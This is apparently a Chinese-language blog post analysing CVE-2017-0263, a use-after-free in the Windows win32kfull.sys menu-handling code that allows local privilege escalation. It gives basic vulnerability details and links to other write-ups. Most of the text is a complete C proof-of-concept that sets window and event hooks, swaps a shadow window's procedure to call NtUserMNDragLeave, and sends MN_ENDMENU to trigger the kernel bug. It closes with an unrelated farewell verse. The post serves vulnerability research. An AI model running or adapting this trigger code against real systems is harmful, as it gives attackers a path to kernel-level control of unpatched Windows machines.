CVE-2017-0263漏洞分析
0x00漏洞信息
漏洞影响:本地提权
漏洞文件:win32kfull.sys
漏洞函数:xxxMNEndMenuState
漏洞原因:释放重引用
漏洞日期:2017年 5月9号
【漏洞分析合集】
0x01漏洞分析
https://xiaodaozhi.com/exploit/71.html
https://bbs.kanxue.com/thread-273313.htm#msg_header_h2_2
https://bbs.kanxue.com/thread-263914.htm#msg_header_h1_5
https://zhuanlan.zhihu.com/p/183165861
0x02验证poc
#include <Windows.h> #include <wingdi.h> #include <iostream> #include <Psapi.h> #pragma comment(lib, "psapi.lib") typedef NTSTATUS(NTAPI* myfull) (); LRESULT WINAPI xxShadowWindowProc( _In_ HWND hwnd, _In_ UINT msg, _In_ WPARAM wParam, _In_ LPARAM lParam ) { HINSTANCE LibHandle; LibHandle = LoadLibrary("win32u"); myfull funtion = (myfull)GetProcAddress(LibHandle, "NtUserMNDragLeave"); if (msg == WM_NCDESTROY) { funtion(); } return DefWindowProcW(hwnd, msg, wParam, lParam); } int iShadowCount = 0; HWND hwndMenuHit = 0; LRESULT CALLBACK xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam) { tagCWPSTRUCT* cwp = (tagCWPSTRUCT*)lParam; if (cwp->message != WM_NCCREATE) { return CallNextHookEx(0, code, wParam, lParam); } WCHAR szTemp[0x20] = { 0 }; GetClassNameW(cwp->hwnd, szTemp, 0x14); if (!wcscmp(szTemp, L"#32768")) { hwndMenuHit = cwp->hwnd; } if (!wcscmp(szTemp, L"SysShadow") && hwndMenuHit != NULL) { if (++iShadowCount == 3) { SetWindowLongW(cwp->hwnd, GWLP_WNDPROC, (LONG)xxShadowWindowProc); } else { SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_HIDEWINDOW); SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_SHOWWINDOW); } } return CallNextHookEx(0, code, wParam, lParam); } int iMenuCreated = 0; #define MN_ENDMENU 0x1F3 VOID CALLBACK xxWindowEventProc( HWINEVENTHOOK hWinEventHook, DWORD event, HWND hwnd, LONG idObject, LONG idChild, DWORD idEventThread, DWORD dwmsEventTime ) { if (++iMenuCreated == 2) { __debugbreak(); SendMessageW(hwnd, MN_ENDMENU, 0, 0); } else { SendMessageW(hwnd, WM_LBUTTONDOWN, 1, 0x00020002); // (2,2) } } static DWORD WINAPI xxTrackExploitEx(LPVOID lpThreadParameter) { LPCSTR szMenuItem = "item"; MENUINFO mi = { 0 }; mi.cbSize = sizeof(mi); mi.fMask = MIM_STYLE; mi.dwStyle = MNS_AUTODISMISS | MNS_MODELESS | MNS_DRAGDROP; HMENU hpopupMenu[2] = { 0 }; hpopupMenu[0] = CreatePopupMenu(); hpopupMenu[1] = CreatePopupMenu(); SetMenuInfo(hpopupMenu[0], &mi); SetMenuInfo(hpopupMenu[1], &mi); AppendMenuA(hpopupMenu[0], MF_BYPOSITION | MF_POPUP, (UINT_PTR)hpopupMenu[1], szMenuItem); AppendMenuA(hpopupMenu[1], MF_BYPOSITION | MF_POPUP, 0, szMenuItem); WNDCLASSEXW wndClass = { 0 }; wndClass = { 0 }; wndClass.cbSize = sizeof(WNDCLASSEXW); wndClass.lpfnWndProc = DefWindowProcW; wndClass.cbWndExtra = 0; wndClass.hInstance = GetModuleHandleA(NULL); wndClass.lpszMenuName = NULL; wndClass.lpszClassName = L"WNDCLASSMAIN"; RegisterClassExW(&wndClass); HWND hWindowMain = NULL; hWindowMain = CreateWindowExW(WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST, L"WNDCLASSMAIN", NULL, WS_VISIBLE, 0, 0, 1, 1, NULL, NULL, GetModuleHandleA(NULL), NULL); SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc, GetModuleHandleA(NULL), GetCurrentThreadId()); SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART,//菜单开始hook GetModuleHandleA(NULL), xxWindowEventProc, GetCurrentProcessId(), GetCurrentThreadId(), 0); //__debugbreak(); TrackPopupMenuEx(hpopupMenu[0], 0, 0, 0, hWindowMain, NULL); MSG msg = { 0 }; while (GetMessageW(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessageW(&msg); } return 0; } int main(int argc, char* argv[]) { HANDLE hThread = CreateThread(NULL, 0, xxTrackExploitEx, NULL, 0, NULL); if (hThread == NULL) { return FALSE; } getchar(); return 0; }
从此山高路远,纵马扬鞭。愿往后旅途,三冬暖,春不寒,天黑有灯,下雨有伞。此生尽兴,不负勇往。
